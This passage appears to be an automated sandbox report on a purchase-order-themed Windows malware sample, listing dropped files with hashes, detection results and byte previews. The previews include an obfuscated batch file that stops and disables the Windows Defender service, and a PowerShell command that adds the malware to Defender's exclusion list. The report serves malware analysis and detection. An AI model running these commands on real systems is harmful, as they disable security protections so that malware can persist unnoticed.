                                                                                    SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                                                    SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                                                    Malicious:false
                                                                                    Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                    Process:C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):326
                                                                                    Entropy (8bit):3.1192967794857243
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:kKjkwTJ0N+SkQlPlEGYRMY9z+4KlDA3RUe0ht:IwTJrkPlE99SNxAhUe0ht
                                                                                    MD5:867208FDC0011BB0AAD04D0F71742310
                                                                                    SHA1:0F84E3ADACBAFE22A60258CBD0E55F52D0182F52
                                                                                    SHA-256:D3126C132F43D87523FD33D729EC3885ACD6AD5557D9056E447EBB0FE3F44B66
                                                                                    SHA-512:E5F073C2625506540A70A1827CA6E49392071717A7D9B6E645E7CB85C545BECC0279E33DE26205DF953C4999AEC645199FDA5B6F5A05582C7863FFF88271ED7F
                                                                                    Malicious:false
                                                                                    Preview: p...... .........Z...,..(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...
                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):14734
                                                                                    Entropy (8bit):4.993014478972177
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
                                                                                    MD5:8D5E194411E038C060288366D6766D3D
                                                                                    SHA1:DC1A8229ED0B909042065EA69253E86E86D71C88
                                                                                    SHA-256:44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
                                                                                    SHA-512:21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
                                                                                    Malicious:false
                                                                                    Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):22336
                                                                                    Entropy (8bit):5.600727062315433
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:ltCDX0qZhF4/RY4Kn4jultI2D7Y9gxSJUeRe1BMrmb4SRV7rSLkC564I+pzg:0fFiu4K4CltJ3xXeNqFivE
                                                                                    MD5:73198456EC9CD93402A12C67F75EEBD5
                                                                                    SHA1:8A2B76B9D5F123ABE2F1F275AFAD29E5F5D2A9C4
                                                                                    SHA-256:D658934AD7CC52739BA1A2808A53EDEAA5F3C227C8192FF9597F848AF26B8871
                                                                                    SHA-512:A63A63DA0AF86F295BE0D58ADE3738C956FDE8B3EEE41A5DE76E9AFEA1C9034F42982D1660EA6FB080AE682008D1FE666DFA4B73E61552A9110B1A50353C628B
                                                                                    Malicious:false
                                                                                    Preview: @...e.......................S.F.&.......=............@..........H...............<@.^.L."My...:R..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                    C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe
                                                                                    Process:C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):91000
                                                                                    Entropy (8bit):6.241345766746317
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                    MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                    SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                    SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                    SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: RFQ-034.exe, Detection: malicious, Browse
                                                                                    • Filename: Payment Slip.exe, Detection: malicious, Browse
                                                                                    • Filename: Revised Invoice No CU 7035.exe, Detection: malicious, Browse
                                                                                    • Filename: Sales_Order description.exe, Detection: malicious, Browse
                                                                                    • Filename: Outstanding invoices.exe, Detection: malicious, Browse
                                                                                    • Filename: Q88_Bulk Carrier.exe, Detection: malicious, Browse
                                                                                    • Filename: Payment _Slip copy.exe, Detection: malicious, Browse
                                                                                    • Filename: MV. HUA KAI V-2023.exe, Detection: malicious, Browse
                                                                                    • Filename: Order_April shipment.exe, Detection: malicious, Browse
                                                                                    • Filename: INVOICE for Order PIEX310113978.exe, Detection: malicious, Browse
                                                                                    • Filename: Krishna Gangaa Enviro System Pvt Ltd.exe, Detection: malicious, Browse
                                                                                    • Filename: TT SWIFT COPY.exe, Detection: malicious, Browse
                                                                                    • Filename: PO75773937475895377.exe, Detection: malicious, Browse
                                                                                    • Filename: SecuriteInfo.com.Artemis5C44BBDCCDFF.4370.exe, Detection: malicious, Browse
                                                                                    • Filename: Download Report.06.05.2021.exe, Detection: malicious, Browse
                                                                                    • Filename: Outstanding invoices.exe, Detection: malicious, Browse
                                                                                    • Filename: IMG_767893434432.exe, Detection: malicious, Browse
                                                                                    • Filename: VMtEguRH.exe, Detection: malicious, Browse
                                                                                    • Filename: SHIPPING DOCS - MV. SN QUEEN.exe, Detection: malicious, Browse
                                                                                    • Filename: MT CAPE AZALEA V219 PENAVICO 13-10-20.exe, Detection: malicious, Browse
                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                    C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\test.bat
                                                                                    Process:C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe
                                                                                    File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):8399
                                                                                    Entropy (8bit):4.665734428420432
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                    MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                    SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                    SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                    SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                    Malicious:false
                                                                                    Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_autfnfbp.5ke.psm1
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:very short file (no magic)
                                                                                    Category:dropped
                                                                                    Size (bytes):1
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:U:U
                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                    Malicious:false
                                                                                    Preview: 1
                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dva0twzw.csn.ps1
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:very short file (no magic)
                                                                                    Category:dropped
                                                                                    Size (bytes):1
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:U:U
                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                    Malicious:false
                                                                                    Preview: 1
                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iu12tuhx.b3d.ps1
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:very short file (no magic)
                                                                                    Category:dropped
                                                                                    Size (bytes):1
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:U:U
                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                    Malicious:false
                                                                                    Preview: 1
                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n5lfjoqp.nj0.psm1
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:very short file (no magic)
                                                                                    Category:dropped
                                                                                    Size (bytes):1
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:U:U
                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                    Malicious:false
                                                                                    Preview: 1
                                                                                    C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe
                                                                                    Process:C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):91000
                                                                                    Entropy (8bit):6.241345766746317
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                    MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                    SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                    SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                    SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                    C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\test.bat
                                                                                    Process:C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                                                                                    File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                    Category:modified
                                                                                    Size (bytes):8399
                                                                                    Entropy (8bit):4.665734428420432
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                    MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                    SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                    SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                    SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                    Malicious:false
                                                                                    Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                    C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe
                                                                                    Process:C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):91000
                                                                                    Entropy (8bit):6.241345766746317
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                    MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                    SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                    SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                    SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                    C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\test.bat
                                                                                    Process:C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe
                                                                                    File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):8399
                                                                                    Entropy (8bit):4.665734428420432
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                    MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                    SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                    SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                    SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                    Malicious:false
                                                                                    Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                    C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe
                                                                                    Process:C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):32008
                                                                                    Entropy (8bit):6.50608873264544
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:/FmaU0mnYm/8KfVJlIAHcQxGflnBieit0JLkbPd2HdPIZy75V3qKncMrGDDkhx6Z:/FmaU0mnYm/XfFHcQiv2
                                                                                    MD5:27233176A2A979195B01A53EC16C7631
                                                                                    SHA1:0EF424D2000F18E6B83473535BF85D22ED9AB79B
                                                                                    SHA-256:397A62FC978F7A97A87CAAF9C35E98E4A053DE4E786BEEE73A6C1AC0E99C9FC9
                                                                                    SHA-512:F8A620CA97069FA352621BB76C1C83BDEBB7692F0B80DE2E9D273EBB718D4D4BA412F2B057580023BD646DA09647D82E035F6C2AD28E59200B7433FD1AB2D0E7
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 15%
                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..^..........~}... ........@.. ..............................S.....@.................................(}..S....................h............................................................... ............... ..H............text....]... ...^.................. ..`.rsrc................`..............@..@.reloc...............f..............@..B................`}......H........5...H...........................................................*".(.....*Vs....(....t.........*".(.....*R.(.......s....}....*6.(....o,....*....0...........~.....+..*..0..9........r...p..((....rE..p.(......(......,...(.....+..~.....+..*....0..#........r...p..((....rE..p.(.......(.....*..0..9........s.....+........o....o.....o....,...o........o....o.....*....0...........(....o.....+.+........*.0.. ........rI..p.+..........s......%r_..p .........%.r...p.%.r...p.%.r...p
                                                                                    C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe:Zone.Identifier
                                                                                    Process:C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:modified
                                                                                    Size (bytes):26
                                                                                    Entropy (8bit):3.95006375643621
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                    Malicious:true
                                                                                    Preview: [ZoneTransfer]....ZoneId=0
                                                                                    C:\Users\user\Documents\20210408\PowerShell_transcript.445817.dfbKEN5N.20210408122415.txt
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):5845
                                                                                    Entropy (8bit):5.399277409284378
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:BZVhtNxqDo1ZeZFhtNxqDo1ZtMGkjZWhtNxqDo1ZQ100DZU:u
                                                                                    MD5:B240F22E63DF44CA4B62678B85131460
                                                                                    SHA1:C119F7AAAB0B4B6446C09C72634F7944540742E4
                                                                                    SHA-256:94293DB0624CC339E38D1231CA91500CAC8F27911A4409441F69EE1B2077782B
                                                                                    SHA-512:E66C91C83D3AA181E1914D0759B936E4EAA38E2B97677564963D071CE13C97B94FB5CA2CAAD5AFE56CD0E715F88A8B0A71A888B8425D42506B6D68588F7E395B
                                                                                    Malicious:false
                                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210408122441..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 445817 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\08042021New-PurchaseOrder.exe -Force..Process ID: 3636..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210408122441..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\08042021New-PurchaseOrder.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210408122931..Username: computer\user..RunA
                                                                                    C:\Users\user\Documents\20210408\PowerShell_transcript.445817.ku7owyer.20210408122414.txt
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):5845
                                                                                    Entropy (8bit):5.400354439564955
